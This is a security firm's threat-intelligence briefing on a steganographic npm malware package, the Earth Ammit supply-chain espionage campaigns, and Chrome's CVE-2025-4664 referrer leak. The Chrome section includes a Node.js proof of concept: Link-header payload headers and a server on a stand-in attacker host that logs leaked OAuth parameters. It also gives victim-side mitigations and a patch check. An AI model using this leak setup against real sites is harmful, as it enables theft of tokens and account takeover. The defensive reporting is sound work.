
Ankura CTIX FLASH Update - May 16, 2025

Malware Activity


Malicious npm Package Evades Detection and Delivers Sophisticated Multi-Stage Payload

Researchers have uncovered a sophisticated malware campaign involving a malicious npm package named "os-info-checker-es6", which poses as a system utility but stealthily delivers a multi-stage payload using advanced obfuscation and command-and-control (C2) evasion techniques. First published on March 19, 2025, the package was initially benign but evolved significantly by May 7, when version 1.0.8 introduced Unicode-based steganography to hide a C2 mechanism that leverages Google Calendar short links as dead-drop resolvers. The malicious code hides its first stage in invisible Unicode Variation Selectors; the decoded stage resolves the Google Calendar short link, extracts a base64-encoded URL from the calendar event's metadata, decodes it, and executes what it fetches via eval(), with the payload potentially encrypted using keys carried in HTTP response headers. The package also includes a simple mutex-style check so that only one instance runs at a time. Additionally, it is listed as a dependency in four (4) other suspicious packages (skip-tot, vue-dev-serverr, vue-dummyy, and vue-bit) which masquerade as development tools. Although the final payload was not retrievable during analysis, suggesting the campaign may be dormant or selectively active, the continued availability of these packages on npm highlights the persistent risk posed by software supply chain attacks. CTIX analysts will continue to report on the latest malware strains and attacker tactics, techniques, and procedures (TTPs).


Threat Actor Activity


Chinese-linked Earth Ammit Targeting Drone Supply Chains and Other Military Components 

The cyber espionage group known as Earth Ammit has been linked to two (2) related campaigns, VENOM and TIDRONE, targeting various sectors in Taiwan and South Korea between 2023 and 2024. These campaigns, attributed to Chinese-speaking nation-state actors, aimed to compromise the drone supply chain and other critical sectors such as military, satellite, heavy industry, media, technology, software services, and healthcare. The VENOM campaign primarily targeted software service providers in Taiwan and heavy industry firms in South Korea by exploiting web server vulnerabilities to deploy web shells and remote access tools. This allowed Earth Ammit to harvest credentials and set the stage for the subsequent TIDRONE campaign. VENOM's use of open-source tools like REVSOCK and Sliver was a deliberate attempt to obscure attribution. The TIDRONE campaign focused on the military industry, particularly drone manufacturers. It involved three (3) stages: initial access through service providers, command-and-control using DLL loaders to drop the CXCLNT and CLNTEND backdoors, and post-exploitation activities such as privilege escalation and information collection. These campaigns demonstrate Earth Ammit's strategy of infiltrating upstream segments of the supply chain in order to reach downstream customers, with potentially broad consequences well beyond the initial victims. The connection between VENOM and TIDRONE is evident through shared victims, service providers, and command-and-control infrastructure, suggesting a common threat actor behind both campaigns. The tactics, techniques, and procedures (TTPs) resemble those used by another Chinese nation-state hacking group, Dalbit, indicating a shared toolkit.


Vulnerabilities


Chrome Vulnerability with PoC Cross-Origin Data Leak Exploit Receives Patch

Google has released urgent security updates to address a high-severity vulnerability in the Chrome browser that is being actively exploited in the wild. The flaw, tracked as CVE-2025-4664, was discovered by Solidlab security researcher Vsevolod Kokorin and stems from insufficient policy enforcement in Chrome's Loader component, allowing a remote attacker to leak cross-origin data via a maliciously crafted HTML page. Chrome, unlike other browsers, honors a referrer policy delivered in the Link header of a subresource response; by setting a referrer policy of unsafe-url there, an attacker-controlled third-party image embedded in a victim page can receive that page's full URL, including sensitive query parameters (such as OAuth codes or tokens), potentially leading to full account takeover. While it is unclear whether the vulnerability has been widely abused beyond proof-of-concept (PoC) demonstrations, Google has acknowledged reports of a public exploit and urged users to update Chrome immediately. The patched versions (136.0.7103.113/.114 for Windows and macOS, and 136.0.7103.113 for Linux) are now available, with automatic updates rolling out. Users of other Chromium-based browsers like Edge, Brave, Opera, and Vivaldi are also advised to apply patches once available. This marks the second actively exploited Chrome vulnerability patched in 2025, following CVE-2025-2783, which was linked to espionage attacks targeting Russian organizations. CTIX analysts recommend that all users of Chrome and Chromium-based browsers confirm their browsers are updated to a patched version to prevent exploitation.
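To make the leak concrete, the following Node.js script is an added example written for this briefing, not code from Google, Solidlab or the researcher. It models both sides of the issue: the response headers an attacker's image host would return so that an unpatched Chrome issues a follow-up request with the embedding page's full URL as Referer, the server-side function that pulls the leaked query parameters out of that Referer, the victim-side headers that remove the exposure regardless of browser version, and a version check against the fixed build. The hostnames, the `code` parameter, the Link header syntax and the port are constructed for illustration.

```javascript
// Added example (not Google's, Solidlab's or the researcher's code).
// Models the CVE-2025-4664 cross-origin leak from the attacker's and the
// defender's side. Hostnames and parameter names are constructed.

const LEAK_ENDPOINT = 'https://attacker.invalid/leak';

// Headers an attacker-controlled image host returns for a third-party <img>.
// Unpatched Chrome applied the referrerpolicy carried in a Link header on a
// subresource response, so the preload of LEAK_ENDPOINT was sent with the
// embedding page's full URL (query string included) as Referer.
function attackerImageHeaders() {
  return {
    'Content-Type': 'image/gif',
    'Link': `<${LEAK_ENDPOINT}>; rel=preload; as=image; referrerpolicy=unsafe-url`,
  };
}

// What the attacker learns from one Referer value. Returns null when the
// browser sent no referrer or only an origin (what a patched browser sends
// under the default strict-origin-when-cross-origin policy); otherwise the
// query parameters of the page that embedded the image.
function extractLeakedParams(referer) {
  if (!referer) return null;
  const u = new URL(referer);
  if (!u.search) return null;
  return Object.fromEntries(u.searchParams);
}

// Victim-side defense in depth that holds on any browser: pin the referrer
// policy on pages that carry secrets in their URL, and do not let such pages
// load images from arbitrary third-party hosts at all.
function victimPageHeaders() {
  return {
    'Referrer-Policy': 'no-referrer',
    'Content-Security-Policy': "img-src 'self'",
  };
}

// True when a Chrome/Chromium version string is at or above the fixed build.
function isPatchedChromeVersion(version, fixed = '136.0.7103.113') {
  const have = version.split('.').map(Number);
  const want = fixed.split('.').map(Number);
  for (let i = 0; i < want.length; i++) {
    const x = have[i] ?? 0;
    if (x !== want[i]) return x > want[i];
  }
  return true;
}

// Minimal attacker host for a local demo: serve the "image" with the Link
// header and log whatever the browser sends back to /leak. Start it with
// startAttackerHost(8080) and embed http://localhost:8080/pixel.gif in a page
// whose URL carries a query string; a patched build sends an origin-only
// Referer and extractLeakedParams() returns null.
function startAttackerHost(port) {
  const http = require('node:http');
  return http.createServer((req, res) => {
    if (req.url.startsWith('/leak')) {
      console.log('leaked params:', extractLeakedParams(req.headers.referer));
      res.writeHead(204).end();
      return;
    }
    res.writeHead(200, attackerImageHeaders()).end(Buffer.from('GIF89a'));
  }).listen(port);
}

// Offline demonstration with a constructed Referer of the kind an OAuth
// callback page would expose.
console.log(extractLeakedParams('https://victim.invalid/oauth/callback?code=AUTHCODE123&state=xyz'));
console.log('136.0.7103.92 patched?', isPatchedChromeVersion('136.0.7103.92'));
```

The version check is the quick fleet-wide triage: feed it the Chrome version reported by endpoint management and list every host below 136.0.7103.113. The victim-side headers are worth keeping even after patching, since any future referrer bug in any browser is harmless to a page that never puts a bearer secret in its URL.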


© Copyright 2025. The views expressed herein are those of the author(s) and not necessarily the views of Ankura Consulting Group, LLC., its management, its subsidiaries, its affiliates, or its other professionals. Ankura is not a law firm and cannot provide legal advice.
